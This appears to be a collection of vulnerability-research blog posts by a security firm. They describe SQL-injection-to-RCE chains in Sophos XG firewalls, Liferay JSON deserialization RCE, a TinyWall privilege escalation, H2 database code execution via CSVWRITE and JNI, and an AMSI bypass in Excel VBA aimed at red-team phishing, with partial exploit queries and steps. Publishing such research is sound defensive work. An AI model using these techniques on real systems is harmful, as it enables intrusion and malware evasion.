The preceding call (variableInitialization) initialized the Perl environment and should always succeed. In order to keep our request simple and not to introduce additional requirements, the Entity value in our payload should not be one of the following: securityprofile, mtadataprotectionpolicy, dataprotectionpolicy, firewallgroup, securitypolicy, formtemplate or authprofile. This allowed us to skip the checks performed in the function opcodePreProcess.

The checkUserPermission function does what its name suggests. Whereas, the function body that can be seen below is only executed if the JSON object passed to Perl included a __username parameter. This parameter was added by the Java component before the request was forwarded to the CSC binary, if the HTTP request was associated with a valid user session. Since we used an unauthenticated mode in our payload, the __username parameter was not set and we could ignore the respective code.

To skip over the preMigration call we just had to choose a mode which was unequal to 35 (cancel_firmware_upload), 36 (multicast_sroutes_disable) or 1101 (unknown). On top of that all three modes required authentication making them unusable for our purposes, anyway.

Depending on the request type, the function createModeJSON employed a different logic to load the Perl module connected to the specified entity. Whereas each POST request initially started as ORM request, we needed to be careful that the request type was not changed to something else. This was required to satisfy the last if statement before the vulnerable function was called inside the apiInterface function. Therefore the condition on line 15 had to be not satisfied. The respective code checked if the request type specified in the loaded Perl module equaled ORM. We leave the identification of such an Entity as an exercise to the interested reader.

We skipped the call to the migrateToCurrVersion function since it was not important for our chain. The next call to createJson verified if the previously loaded Perl package could actually be initialized and would always work as long as it referred to an existing Entity.

The function handleDeleteRequest once again verified that the request type was ORM. After removing duplicate keys from our JSON, it ensured that our JSON payload contained a name key. The code then looped through all values which were specified in our name property and searched for foreign references in other database tables in order to delete these. Since we did not want to delete any existing data we simply set the name to a non-existing value.

We skipped the last two function calls to replyIfErrorAtValidation and getOldObject because they were not relevant to our chain and we had already walked through enough Perl code.

What did we learn so far?

  • We need a mode which can be called from an unauthenticated perspective.
  • We should not use certain Entities.
  • Our request needed to be of type $REQUEST_TYPE{ORMREQUEST}.
  • The request had to contain a name property which held some garbage value.
  • The EventProperties of the loaded Entity, and in particular the DELETE property, had to set the ORM value to true.
  • Our JSON object had to contain a query key which held the actual SQL statement we wanted to execute.

When we satisfied all of the above conditions we were able to execute arbitrary SQL statements. There was only one caveat: we could not use any quotes in our SQL statements since the csc binary properly escaped those (see the escapeRequest sub 0-day chapter for details). As a workaround we defined strings with the help of the concat and chr SQL functions.

From SQLi to RCE

Once we had gained the ability to modify the database to our needs, there were quite a few places where the SQLi could be expanded into an RCE. This was the case because parameters contained within the database were passed to exec calls without sanitation in multiple instances. Here we will only focus on the attack path which was, based on our understanding and the details released in Sophos' analysis, used during the Asnarök campaign.

According to the published information, the attackers injected their payloads in the hostname field of the Sophos Firewall Manager (SFM) to achive code execution. SFM is a separate appliance to centrally manage multiple appliances. This raised the question: what happens in the back end if you enable the central administration?

To locate the database values related to the SFM functionality we dumped the database, enabled SFM in the front end, and created another dump. A diff of the dumps was then used to identify the changed values. This approach revealed the modification of multiple database rows. The attribute CCCAdminIP in the table tblclientservices was the one used by the attackers to inject their payload. A simple grep for CCCAdminIP directed us to the function get_SOA in the Perl code.

As can be seen on line 15, the code retrieves the value of the CCCAdminIP from the database and passes it unfiltered into the EXECSH call on line 22. Due to some kind of cronjob the get_SOA opcode is executed regularly leading to the automatic execution of our payload.

What made this particular attack chain very unfortunate was the if condition on line 11, as it allowed us to reach the EXECSH call only if the automatic installation of hotfixes is active (which is the default setting) and if the appliance is configured to use SFM for central management (which is not the default setting). This resulted in a situation in which the attackers most likely only gained code execution on devices with activated auto-updates - leading to a race condition between the hotfix installation and the moment of exploitation.

Installations that do not have automatic hotfixes enabled or have not moved to the latest supported maintenance releases could still be vulnerable.

Gaining code execution via the SQLi described in CVE-2020-12271.

From N to Zero (CVE-2020-15504)

Another promising approach for discovery of the n-day, instead of starting at a patch diff, seemed to be an analysis of all back end functions (callable via the /webconsole/Controller endpoint) which did not require authentication. The respective function numbers could, for example, be extracted from the Java function getPreAuthOperationList.

SQL-Injection countermeasures inside the Perl logic

Despite of the fact that the back end performed all its SQL operations without prepared-statements, those were not automatically susceptible to injection.

The reason for this was, that all function parameters coming in via port 299 were automatically escaped via the escapeRequest function before being processed.

So everything is safe?

One function which caught our attention was RELEASEQUARANTINEMAILFROMMAIL (NR 2531) as the corresponding logic silently bypassed the automatic escaping. This happened because the function treated one of the user-controllable parameters as a Base64 string and used this parameter, decoded, inside a SQL statement. As the global escaping took place before the function was actually called, it only ever saw the encoded string and thus missed any included special characters such as single quotes.

After the parameter was decoded, it was split into different variables. This was done by parsing the string based on the key=value syntax used in HTTP requests. We were concentrating on the hdnFilePath variable, as its value did not need to satisfy any complicated conditions and ended up in the SQL statement later on.

The only constraint for $requestData{hdnFilePath} was, that it did not contain the sequence ../ (which was irrelevant for our purposes anyway). After crafting a release parameter in the appropriate format we were now able to trigger a SQLi in the above SELECT statement. We had to be careful to not break the syntax by taking into account that the manipulated parameter was inserted six times into the query.

Triggering a database sleep through the discovered SQL-I (6s delay as the sleep command was injected 6 times).

Upgrading the boring Select statement

The ability to trigger a sleep enables an attacker to use well known blind SQLi techniques to read out arbitrary database values. The underlying Postgres instance (iviewdb) differed from the one targeted in the n-day. As this database did not seem to store any values useful for further attacks, another approach was chosen.

With the code-execution technique used by Asnarök in mind, we aimed for the execution of an INSERT operation alongside a SELECT. In theory, this should be easily achievable by using stacked queries. After some experimentation, we were able to confirm that stacked queries were supported by the deployed Postgres version and the used database API. Yet, it was impossible to get it to work through the SQLi. After some frustration, we found out that the function iviewdb_query (/lib/libcscaid.so) called the escape_string (/usr/bin/csc) function before submitting the query. As this function escaped all semicolons in the SQL statement, the use of stacked queries was made impossible.

Giving up yet?

At this point, we were able to trigger an unauthenticated SQL Injection in a SELECT statement in the iviewdb database, which did not provide us with any meaningful starting points for an escalation to RCE. Not wanting to abandon the goal of achieving code execution we brainstormed for other approaches. Eventually we came up with the following idea - what if we modified our payload in such a way that the SQL statement returned values in the expected form? Could this allow us to trigger the subsequent Perl logic and eventually reach a point where a code execution took place? Constructing a payload which enabled us to return arbitrary values in the queried columns took some attempts but succeeded in the end.

Execution of a SELECT statement which returns values specified inside the payload.

After we had managed to construct such a payload we concentrated on the subsequent Perl logic. Looking at the source we found a promising EXEC call just after the database query. And one of the parameters for that call was derived from a variable under user control.

Unfortunately, the variable $g_ha_mode (most likely related to the high availability feature) was set to false in the default configuration. This prompted us to look for a better way. The function mergequarantine_manage did not contain any further exec calls but triggered two other Perl functions in the same file, under the right conditions. Those functions were triggered via the apiInterface opcode which generated a new CSC request on port 299.

In our case $request->{action} was always set to release restricting us to a call to manage_quarantine. This function used its submitted parameters (result-set from the query in mergequarantine_manage) to trigger another SELECT statement. When this statement returned matching values an EXEC call was triggered, which got one of the returned values as a parameter.

The question now was how the result-set of the second SELECT statement could be manipulated through the result-set of the first statement? How about returning values in the first query which would trigger a SQLi in the second statement? Because string concatenation was used to construct the statement this should have been possible in theory. Unfortunately, we were unable to obtain the desired results. This was after having invested quite a bit of work to craft such a payload. A brief analysis of how our payload was processed, revealed that it was somehow escaped before reaching the second query. As it turned out, the reason for this was actually pretty obvious. As the function was triggered via a new CSC request, it automatically passed through the previously described escape logic.

Time to accept our defeat and be happy with the boring SQLi? Not quite...

Desperately looking for other ways to weaponize the injection we dug deeper into the involved components. At an earlier stage we already created a full dump of the iviewdb database but did not pay too much attention to it after having realized that it did not include any useful information. On revisiting the database, one of its features - so called user-defined functions - heavily used by the appliance, stood out.

User-defined functions enable the extension of the predefined database operations by defining your own SQL functions. Those can be written in Postgres' own language: PL/pgSQL. What made such functions interesting for our attack was, that previously defined functions could be called in-line in SELECT statements. The call-syntax is the same as for any other SQL function, i.e. SELECT my_function(param1, param2) FROM table;.

The idea at this point was, that one of the existing user-defined functions might allow the execution of stacked queries. This would be the case as soon as a parameter was used for a SQL statement without proper filtering inside a function. Walking over the database dump revealed multiple code blocks matching this characteristic and to our surprise an even simpler way to execute arbitrary statements - the function execute. The respective code expected only one parameter which was directly executed as SQL statement without any further checks.

This function would, in theory, allow us to execute an INSERT statement inside the SELECT query of mergequarantine_manage. This could be then used to add database rows to the table tblquarantinespammailmerge which should later end up in the exec call in manage_quarantine.

Triggering an INSERT statement via the execute function from within a SELECT statement.

After fiddling around for quite some time we were finally able to construct an appropriate payload (see below).

Explanation:

  • Line 1-2: Defining the two HTTP parameters needed for mode 2531.
  • Line 3-6: Defining the three Base64 encoded parameters, that are needed to pass the initial checks in mergequarantine_manage.
  • Line 7: Triggering the SQLi by injecting a single quote.
  • Line 8-11: Utilizing the user-defined function execute in order to trigger different SQL operations than the predefined SELECT.
  • Line 10: Adding a new row to the table tblquarantinespammailmerge that contains our code-execution payload in the field quarantinearea and sets messageid to 'a'. Note the .eml portion inside the payload, which is required to reach the exec call.
  • Line 9: Delete all rows from tblquarantinespammailmerge where the messageid equals 'a'. This ensures that the mentioned table contains our payload only once (remember that the vector is injected 6x in the initial statement). Whereas this is not absolutely necessary it simplifies the path taken after the SELECT statement in manage_quarantine and prevents our payload to be executed multiple times.
  • Line 12-14: Needed to comply with the syntax of the predefined statement.

Using the above payload resulted in the execution of the following Perl command:

So finally our job was done... but somehow there seemed to be no time delay, which would indicate that our sleep has not actually triggered. But why? Did we not use exactly the same execution mechanism as in the n-day? Turns out - not quite. Asnarök used EXECSH we have EXEC. Unfortunately EXEC is treating spaces in arguments correctly by passing them in single values to the script.

I assume we better bury our heads in the sand

We had come to far to give up now, so we carried on. Finally we were able to execute code through the SQLi and it was good ol' Perl which allowed us to do so.

Adding this last piece to the attack chain and fixing a minor issue in the posted payload is left up to the reader.

Triggering a reverse shell by abusing the discovered vulnerability.

Timeline

  • 04.05.2020 - 22:48 UTC: Vulnerability reported to Sophos via BugCrowd.
  • 04.05.2020 - 23:56 UTC: First reaction from Sophos confirming the report receipt.
  • 05.05.2020 - 12:23 UTC: Message from Sophos that they were able to reproduce the issue and are working on a fix.
  • 05.05.2020: Roll out of a first automatic hotfix by Sophos.
  • 16.05.2020 - 23:55 UTC: Reported a possible bypass for the added security measurements in the hotfix.
  • 21.05.2020: Second hotfix released by Sophos which disables the pre-auth email quarantine release feature.
  • June 2020: Release of firmware 18.0 MR1-1 which contains a built-in fix.
  • July 2020: Release of firmware 17.5 MR13 which contains a built-in fix.
  • 13.07.2020: Release of the blog post in accordance with the vendor after ensuring that the majority of devices either received the hotfix or the new firmware version.

We highly appreciate the quick response times, very friendly communication as well as the hotfix feature.

Liferay Portal JSON Web Service RCE Vulnerabilities

20 March 2020 at 12:31

Code White has found multiple critical rated JSON deserialization vulnerabilities affecting the Liferay Portal versions 6.1, 6.2, 7.0, 7.1, and 7.2. They allow unauthenticated remote code execution via the JSON web services API. Fixed Liferay Portal versions are 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2.

The corresponding vulnerabilities are:

CST-7111: RCE via JSON deserialization (LPS-88051/LPE-165981)
The JSONDeserializer of Flexjson allows the instantiation of arbitrary classes and the invocation of arbitrary setter methods.
CST-7205: Unauthenticated Remote code execution via JSONWS (LPS-97029/CVE-2020-7961)
The JSONWebServiceActionParametersMap of Liferay Portal allows the instantiation of arbitrary classes and invocation of arbitrary setter methods.

Both allow the instantiation of an arbitrary class via its parameter-less constructor and the invocation of setter methods similar to the JavaBeans convention. This allows unauthenticated remote code execution via various publicly known gadgets.

Liferay released the patched versions 6.2 GA6 (6.2.5), 7.0 GA7 (7.0.6) and 7.1 GA4 (7.1.3) to address the issues; the version 7.2 GA2 (7.2.1) was already released in November 2019. For 6.1, there is only a fixpack available.

Introduction

Liferay Portal is one of the, if not even the most popular portal implementation as per Java Portlet Specification JSR-168. It provides a comprehensive JSON web service API at '/api/jsonws' with examples for three different ways of invoking the web service method:

  1. Via the generic URL /api/jsonws/invoke where the service method and its arguments get transmitted via POST, either as a JSON object or via form-based parameters (the JavaScript Example)
  2. Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are passed via form-based POST parameters (the curl Example)
  3. Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are also passed in the URL like /api/jsonws/service-class-name/service-method-name/arg1/val1/arg2/val2/… (the URL Example)

Authentication and authorization checks are implemented within the invoked service methods themselves while the processing of the request and thus the JSON deserialization happens before. However, the JSON web service API can also be configured to deny unauthenticated access.

First, we will take a quick look at LPS-88051, a vulnerability/insecure feature in the JSON deserializer itself. Then we will walk through LPS-97029 that also utilizes a feature of the JSON deserializer but is a vulnerability in Liferay Portal itself.

CST-7111: Flexjson's JSONDeserializer

In Liferay Portal 6.1 and 6.2, the Flexjson library is used for serializing and deserializing data. It supports object binding that will use setter methods of the objects instanciated for any class with a parameter-less constructor. The specification of the class is made with the class object key:

This vulnerability was reported in December 2018 and has been fixed in the Enterprise Edition with 6.1 EE GA3 fixpack 71 and 6.2 EE GA2 fixpack 1692 and also the 6.2 GA6.

CST-7205: Jodd's JsonParser + Liferay Portal's JSONWebServiceActionParametersMap

In Liferay Portal 7, the Flexjson library is replaced by the Jodd Json library that does not support specifying the class to deserialize within the JSON data itself. Instead, only the type of the root object can be specified and it has to be explicitly provided by a java.lang.Class object instance. When looking for the call hierarchy of write access to the rootType field, the following unveils:

While most of the calls have hard-coded types specified, there is one that is variable (see selected call on the right above). Tracing that parameterType variable through the call hierarchy backwards shows that it originates from a ClassLoader.loadClass(String) call with a parameter value originating from an JSONWebServiceActionParameters instance. That object holds the parameters passed in the web service call. The JSONWebServiceActionParameters object has an instance of a JSONWebServiceActionParametersMap that has a _parameterTypes field for mapping parameters to types. That map is used to look up the class for deserialization during preparation of the parameters for invoking the web service method in JSONWebServiceActionImpl._prepareParameters(Class<?>).

The _parameterTypes map gets filled by the JSONWebServiceActionParametersMap.put(String, Object) method:

Here the lines 102 to 110 are interesting: the typeName is taken from the key string passed in. So if a request parameter name contains a ':', the part after it specifies the parameter's type, i. e.:

This syntax is also mentioned in some of the examples in the Invoking JSON Web Services tutorial.

Later in JSONWebServiceActionImpl._prepareParameters(Class<?>), the ReflectUtil.isTypeOf(Class, Class) is used to check whether the specified type extends the type of the corresponding parameter of the method to be invoked. Since there are service methods with java.lang.Object parameters, any type can be specified.

This vulnerability was reported in June 2019 and has been fixed this in 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2 by using a whitelist of allowed classes.

Demo


  • [1] There are two editions of the Liferay Portal: the Community Edition (CE) and the Enterprise Edition (EE). The CE is free and its source code is available at GitHub. Both editions have their own project and issue tracker at issues.liferay.com: CE has LPS-* and EE has LPE-*. LPS-88051 was created confidentially by Code White for CE and LPE-16598 was created publicly three days later for EE.
  • [2] Fixpacks are only available for the Enterprise Edition (EE) and not for the Community Edition (CE).

CVE-2019-19470: Rumble in the Pipe

17 January 2020 at 09:18
This blog post describes an interesting privilege escalation from a local user to SYSTEM for a well-known local firewall solution called TinyWall in versions prior to 2.1.13. Besides a .NET deserialization flaw through Named Pipe communication, an authentication bypass is explained as well.

 Introduction

TinyWall is a local firewall written in .NET. It consists of a single executable that runs once as SYSTEM and once in the user context to configure it. The server listens on a Named Pipe for messages that are transmitted in the form of serialized object streams using the well-known and beloved BinaryFormatter. However, there is an additional authentication check that we found interesting to examine and that we want to elaborate here a little more closely as it may also be used by other products to protect themselves from unauthorized access.

For the sake of simplicity the remaining article will use the terms Server for the receiving SYSTEM process and Client for the sending process within an authenticated user context, respectively. Keep in mind that the authenticated user does not need any special privileges (e.g. SeDebugPrivilege) to exploit this vulnerability described.

Named Pipe Communication

Many (security) products use Named Pipes for inter-process communication (e.g. see Anti Virus products). One of the advantages of Named Pipes is that a Server process has access to additional information on the sender like the origin Process ID, Security Context etc. through Windows' Authentication model. Access to Named Pipes from a programmatic perspective is provided through Windows API calls but can also be achieved e.g. via direct filesystem access. The Named Pipe filessystem (NPFS) is accessible via the Named Pipe's name with a prefix \\.\pipe\.

The screenshot below confirms that a Named Pipe "TinyWallController" exists and could be accessed and written into by any authenticated user.


Talking to SYSTEM

First of all, let's look how the Named Pipe is created and used. When TinyWall starts, a PipeServerWorker method takes care of a proper Named Pipe setup. For this the Windows API provides System.IO.Pipes.NamedPipeServerStream with one of it's constructors taking a parameter of System.IO.Pipes.PipeSecurity. This allows for fine-grained access control via System.IO.PipeAccessRule objects using SecurityIdentifiers and alike. Well, as one can observe from the first screenshot above, the only restriction seems to be that the Client process has to be executed in an authenticated user context which doesn't seem to be a hard restriction after all.



But as it turned out (again take a look at the screenshot above) an AuthAsServer() method is implemented to do some further checking. What we want is to reach the ReadMsg() call, responsible for deserializing the content from the message received.



If the check fails, an InvalidOperationException with "Client authentication failed" is thrown. Following the code brought us to a "authentication check" based on Process IDs, namely checking if the MainModule.FileName of the Server and Client process match. The idea behind this implementation seems to be that the same trusted TinyWall binary should be used to send and receive well-defined messages over the Named Pipe.


Since the test for equality using the MainModule.FileName property could automatically be passed when the original binary is used in a debugging context, let's verify the untrusted deserialization with a debugger first.

Testing the deserialization

Thus, to test if the deserialization with a malicious object would be possible at all, the following approach was taken. Starting (not attaching) the TinyWall binary out of a debugger (dnSpy in this case) would fulfill the requirement mentioned above such that setting a breakpoint right before the Client writes the message into the pipe would allow us to change the serialized object accordingly. The System.IO.PipeStream.writeCore() method in the Windows System.Core.dll is one candidate in the process flow where a breakpoint could be set for this kind of modification. Therefore, starting the TinyWall binary in a debugging session out of dnSpy and setting a breakpoint at this method immediately resulted in the breakpoint being hit.



Now, we created a malicious object with ysoserial.NET and James Forshaw's TypeConfuseDelegate gadget to pop a calc process. In the debugger, we use System.Convert.FromBase64String("...") as expression to replace the current value and also adjust the count accordingly.



Releasing the breakpoint resulted in a calc process running as SYSTEM. Since the deserialization took place before the explicit cast was triggered, it was already to late. If one doesn't like InvalidCastExceptions, the malicious object could also be put into a TinyWall PKSoft.Message object's Arguments member, an exercise left to the reader.

Faking the MainModule.FileName

After we have verified the deserialization flaw by debugging the client, let's see if we can get rid of the debugging requirement. So somehow the following restriction had to be bypassed:



The GetNamedPipeClientProcessId() method from Windows API retrieves the client process identifier for the specified Named Pipe. For a final proof-of-concept Exploit.exe our Client process somehow had to fake its MainModule.FileName property matching the TinyWall binary path. This property is retrieved from System.Diagnostics.ProcessModule's member System.Diagnostics.ModuleInfo.FileName which is set by a native call GetModuleFileNameEx() from psapi.dll. These calls are made in System.Diagnostics.NtProcessManager expressing the transition from .NET into the Windows Native API world. So we had to ask ourselves if it'd be possible to control this property.



As it turned out this property was retrieved from the Process Environment Block (PEB) which is under full control of the process owner. The PEB by design is writeable from userland. Using NtQueryInformationProcess to get a handle on the process' PEB in the first place is therefore possible. The _PEB struct is built of several entries as e.g. PRTL_USER_PROCESS_PARAMETERS ProcessParameters and a double linked list PPEB_LDR_DATA Ldr. Both could be used to overwrite the relevant Unicode Strings in memory. The first structure could be used to fake the ImagePathName and CommandLine entries but more interesting for us was the double linked list containing the FullDllName and BaseDllName. These are exactly the PEB entries which are read by the Windows API call of TinyWall's MainModule.FileName code. There is also a nice Phrack article from 2007 explaining the underlying data structures in great detail.

Fortunately, Ruben Boonen (@FuzzySec) already did some research on these kind of topics and released several PowerShell scripts. One of these scripts is called Masquerade-PEB which operates on the Process Environment Block (PEB) of a running process to fake the attributes mentioned above in memory. With a slight modification of this script (also left to the reader) this enabled us to fake the MainModule.FileName.


Even though the PowerShell implementation could have been ported to C#, we chose the lazy path and imported the System.Management.Automation.dll into our C# Exploit.exe. Creating a PowerShell instance, reading in the modified Masquerade-PEB.ps1 and invoking the code hopefully would result in our faked PEB entries of our Exploit.exe.



Checking the result with a tool like Sysinternals Process Explorer confirmed our assumption such that the full exploit could be implemented now to pop some calc without any debugger.

Popping the calc

Implementing the full exploit now was straight-forward. Using our existing code of James Forshaw's TypeConfuseDelegate code combined with Ruben Boonen's PowerShell script being invoked at the very beginning of our Exploit.exe now was extended by connecting to the Named Pipe TinyWallController. The System.IO.Pipes.NamedPipeClientStream variable pipeClient was finally fed into a BinaryFormatter.Serialize() together with the gadget popping the calc.



Thanks to Ruben Boonen's work and support of my colleague Markus Wulftange the final exploit was implemented quickly.

Responsible disclosure

The vulnerability details were sent to the TinyWall developers on 2019-11-27 and fixed in version 2.1.13 (available since 2019-12-31).


Exploiting H2 Database with native libraries and JNI

1 August 2019 at 12:54

Techniques to gain code execution in an H2 Database Engine are already well known but require H2 being able to compile Java code on the fly. This blog post will show a previously undisclosed way of exploiting H2 without the need of the Java compiler being available, a way that leads us through the native world just to return into the Java world using Java Native Interface (JNI).

Introduction

Last week, the blog post Jackson gadgets - Anatomy of a vulnerability by Andrea Brancaleoni of Doyensec was published. It describes how a setter-based vulnerability in the Jackson library can be exploited if the libraries of Logback and H2 Database Engine are available. In short, it exploits the feature of H2 to create user defined functions with Java code that get compiled on the fly using the Java compiler.

But what if the Java compiler is not available? This was the exact case in a recent engagement where a H2 Dabatase Engine instance version 1.2.141 on a Windows system was exposing its web console. We want to walk you through the journey of finding a new way to execute arbitrary Java code without the need of a Java compiler on the target server by utilizing native libraries (.dll or .so) and the Java Native Interface (JNI).

Assessing the Capabilities of H2

Let's assume the CREATE ALIAS … AS … command cannot be used as the Java compiler is not available. A reason for that may be that it's not a Java Development Kit (JDK) but only a Java Runtime Environment (JRE), which does not come with a compiler. Or the PATH environment variable is not properly set up so that the Java compiler javac cannot be found.

However, the CREATE ALIAS … FOR … command can be used:

When referencing a method, the class must already be compiled and included in the classpath where the database is running. Only static Java methods are supported; both the class and the method must be public.

So every public static method can be used. But in the worst case, only h2-1.2.141.jar and JRE are available. And additionally, only supported data types can be used for nested function calls. So, what is left?

While browsing the candidates in the Java runtime library rt.jar, the System.load(String) method stood out. It allows the loading of a native library. That would instantly allow code execution via the library's entry point function.

But how can the library be loaded to the H2 server? Although Java on Windows supports UNC paths and fetches the file, it refuses to actually load it. And this also won't work on Linux. So how can one write a file to the H2 server?

Writing arbitrary Files with H2

A brief look into the H2 functions reference shows that there is a FILE_WRITE function. Unfortunately, FILE_WRITE was introduced in 1.4.190. So we better only check those functions that are available in 1.2.141. The CSVWRITE function is the only one with "write" in its name.

A quick test showed that the CSV column header also gets printed. Looking at the CSV options showed that there is a writeColumnHeader option to disable writing the column header. Unfortunately, the writeColumnHeader option was only added with 1.3/1.4.177.

But while looking at the other supported options fieldSeparator, fieldDelimiter, escape, null, and lineSeparator, there came an idea: what if we blank them all out and use the CSV column header to write our data? And if the H2 database engine allows columns to have arbitrary names with arbitrary length, we ware be able to write arbitrary data.

Looking at H2's grammar for columns, the columnName of a column can be a quoted name, which is defined as:

" anything "

Quoted names are case sensitive, and can contain spaces. There is no maximum name length. Two double quotes can be used to create a single double quote inside an identifier.

That sounds almost perfect. So let's see if we can actually put anything in it and if CSVWRITE is binary-safe.

First, we generate our test data that covers all 8-bit octets:

$ python -c 'import sys;[sys.stdout.write(chr(i)) for i in range(0,256)]' > test.bin
$ sha1sum test.bin
4916d6bdb7f78e6803698cab32d1586ea457dfc8  test.bin

Now we generate a series of CHAR(n) function calls that will generate our binary data in the SQL query:

xxd -p -c 256 test.bin | sed -e 's/../),CHAR(0x&/g' -e 's/^),//' -e 's/$/)/' -e 's/CHAR(0x22)/&,&/g'

We then use it in the following CSVWRITE call:

SELECT CSVWRITE('C:\Windows\Temp\test.bin', CONCAT('SELECT NULL "', … , '"'), 'ISO-8859-1', '', '', '', '', '');

Finally, we test if the written file has the same checksum:

C:\Windows\Temp> certutil -hashfile test.bin SHA1
SHA1 hash of file test.bin:
49 16 d6 bd b7 f7 8e 68 03 69 8c ab 32 d1 58 6e a4 57 df c8
CertUtil: -hashfile command completed successfully.

So, the files seem to be identical!

Entering the native World

Now that we can write a native library to disk using the built-in function CSVWRITE and load it by creating an alias for System.load(String), we just could use the library's entry point to achieve code execution.

But let's take another it step further. Let's see if there is a way to execute arbitrary commands/code from SQL. Not just once the native library gets loaded, but as we like, possibly even with feedback that we can see in the H2 Console.

This is where the Java Native Interface (JNI) comes in. It allows the interaction between native code and the Java Virtual Machine (JVM). So in this case it would allow us to interact with JVM where the H2 Database is running.

The idea now is to use JNI to inject a custom Java class into the running JVM via ClassLoader.defineClass(byte[], int, int). That would allow us to create an alias and call it from SQL.

Calling into the JVM with JNI

First we need to get a handle to the running JVM. This can be done with the JNI_GetCreatedJavaVMs function. Then we attach the current thread to the VM and obtain a JNI interface pointer (JNIEnv). With that pointer we can interact with the JVM and call JNI functions such as FindClass, GetStaticMethodID/GetMethodID> and CallStatic<Type>Method/Call<Type>Method. The plan is to get the system class loader via ClassLoader.getSystemClassLoader() and call defineClass on it:

This basically mimics the following Java code:

The custom Java class JNIScriptEngine has just one single public static method that evaluates the passed script using an available ScriptEngine instance:

Finally, putting everything together:

That way we can execute arbitrary JavaScript code from SQL.

Heap-based AMSI bypass for MS Excel VBA and others

By: Dan
19 July 2019 at 12:03

This blog post describes how to bypass Microsoft's AMSI (Antimalware Scan Interface) in Excel using VBA (Visual Basic for Applications). In contrast to other bypasses this approach does not use hardcoded offsets or opcodes but identifies crucial data on the heap and modifies it. The idea of an heap-based bypass has been mentioned by other researchers before but at the time of writing this article no public PoC was available. This blog post will provide the reader with some insights into the AMSI implementation and a generic way to bypass it.


Introduction

Since Microsoft rolled out their AMSI implementation many writeups about bypassing the implemented mechanism have been released. Code White regularly conducts Red Team scenarios where phishing plays a great role. Phishing is often related to MS Office, in detail to malicious scripts written in VBA. As per Microsoft AMSI also covers VBA code placed into MS Office documents. This fact motivated some research performed earlier this year. It has been evaluated if and how AMSI can be defeated in an MS Office Excel environment.

In the past several different approaches have been published to bypass AMSI. The following links contain information which were used as inspiration or reference:


The first article from the list above also mentions a heap-based approach. Independent from that writeup, Code White's approach used exactly that idea. During the time of writing this article there was no code publicly available which implements this idea. This was another motivation to write this blog post. Porting the bypass to MS Excel/VBA revealed some nice challenges which were to be solved. The following chapters show the evolution of Code White's implementation in a chronological way:

  • Implementing our own AMSI Client in C to have a debugging platform
  • Understanding how the AMSI API works
  • Bypassing AMSI in our own client
  • Porting this approach to VBA
  • Improving the bypass
  • Improving the bypass - making it production-ready

Implementing our own AMSI Client

In order to ease debugging we will implement our own small AMSI client in C which triggers a scan on the malicious string ‘amsiutils’. This string gets flagged as evil since some AMSI Bypasses of Matt Graeber used it. Scanning this simple string depicts a simple way to check if AMSI works at all and to verify if our bypass is functional. A ready-to-use AMSI client can be found on sinn3r's github . This code provided us a good starting point and also contained important hints, e.g. the pre-condition in the Local Group Policies.

We will implement our test client using Microsoft Visual Studio Community 2017. In a first step, we end up with two functions, amsiInit() and amsiScan(), not to be confused with functions exported by amsi.dll. Later we will add another function amsiByPass() which does what its name suggests. See this gist for the final code including the bypass.



Running the program generates the following output:

This means our ‘amsiutils’ is considered as evil. Now we can proceed working on our bypass.

Understanding AMSI Structures

As promised we would like to do a heap-based bypass. But why heap-based?

At first we have to understand that using the AMSI API requires initializing a so called AMSI Context (HAMSICONTEXT). This context must be initialized using the function AmsiInitialize(). Whenever we want to scan something, e.g. by calling AmsiScanBuffer(), we have to pass our context as first parameter. If the data behind this context is invalid the related AMSI functions will fail. This is what we are after, but let's talk about that later.
Having a look at HAMSICONTEXT we will see that this type gets resolved by the pre-processor to the following:


So what we got here is a pointer to a struct called ‘HAMSICONTEXT__’. Let's have a look where this pointer points to by printing the memory address of  ‘amsiContext’ in our client. This will allow us to inspect its contents using windbg:

The variable itself is located at address 0x16a144 (note we have 32-bit program here) and its content is 0x16c8b10, that's where it points to. At address 0x16c8b10 we see some memory starting with the ASCII characters ‘AMSI’ identifying a valid AMSI context. The output below the memory field is derived via ‘!address’ which prints the memory layout of the current process.

There we can see that the address 0x16c8b10 is allocated to a region starting from 0x16c0000 to 0x16df0000 which is identified as Heap. Okay, that means AmsiInitialize() delivers us a pointer to a struct residing on the heap. A deeper look into AmsiInitialize() using IDA delivers some evidence for that:

The function allocates 16 bytes (10h) using the COM-specific API CoTaskMemAlloc(). The latter is intended to be an abstraction layer for the heap. See here and here for details. After allocating the buffer the Magic Word 0x49534D41 is written to the beginning of the block, which is nothing more than our ‘AMSI’ in ASCII.

It is noteworthy to say that an application cannot easily change this behavior. The content of the AMSI context will always be stored on the heap unless really sneaky things are done, like copying the context to somewhere else or implementing your own memory provider. This explains why Microsoft states in their API  documentation, that the application is responsible to call AmsiUnitialize() when it is done with AMSI. This is because the client cannot (should not) free that memory and the process of cleaning up is performed by the AMSI library.

Now we have understood that
  • the AMSI Context is an important data structure
  • it is always placed on the heap
  • it always starts with the ASCII characters ‘AMSI’
In case our AMSI context is corrupt, functions like AmsiScanBuffer() will fail with a return value different from zero. But what does corrupt mean, how does  AmsiScanBuffer() detect if the context is valid? Let's check that in IDA:


The function does what we already spoilered in the beginning: The first four bytes of the AMSI Context are compared against the value ‘0x49534D41’. If the comparison fails, the function returns with 0x80070057 which does not equal 0 and tells something went wrong.

Bypassing AMSI in our own AMSI Client

Our heap-based approach assumes several things to finally depict a so called bypass:

  • we have already code execution in the context of the AMSI client, e.g. by executing a VBA script
  •  The AMSI client (e.g. Excel) initializes the AMSI context only once and reuses this for every AMSI operation
  • the AMSI client rates the checked payload in case of a failure of AmsiScanBuffer() as ‘not malicious

The first point is not true for our test client but also not required because it depicts only a test vehicle which we can modify as desired.

Especially the last point is important because we will try to mess up the one and only AMSI context available in the target process. If the failure of AmsiScanBuffer() leads to negative side effects, in worst case the program might crash, the bypass will not work.

So our task is to iterate through the heap of the AMSI client process, look for chunks starting with ‘AMSI’ and mess this block up making all further AMSI operations fail.

Microsoft provides a nice code example which walks through the heap using a couple of functions from kernel32.dll.

Due to the fact that all the required information is present in user space one could do this task by parsing data structures in memory. Doing so would make the use of external functions obsolete but probably blow up our code so we decided to use the functions from the example above.

After cutting the example down to the minimum functionality we need, we end up with a function amsiByPass().


So this code retrieves the heap of the current process, iterates through it and looks at every chunk tagged as 'busy'. Within these busy chunks we check if the first bytes match our magic pattern ‘AMSI’ and if so overwrite it with some garbage.

